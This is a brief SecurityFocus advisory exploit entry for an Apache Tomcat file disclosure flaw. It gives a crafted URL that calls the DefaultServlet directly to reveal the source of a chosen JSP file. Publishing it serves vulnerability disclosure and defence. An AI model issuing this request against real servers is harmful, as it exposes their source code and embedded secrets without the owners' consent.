Apache Tomcat DefaultServlet File Disclosure Vulnerability

Issue a request for the following URL, where 'target' is the target Tomcat server/port and 'target.jsp' is the desired JSP file:

http://target/admin/servlet/org.apache.catalina.servlets.DefaultServlet/target.jsp


 

Privacy Statement
Copyright 2010, SecurityFocus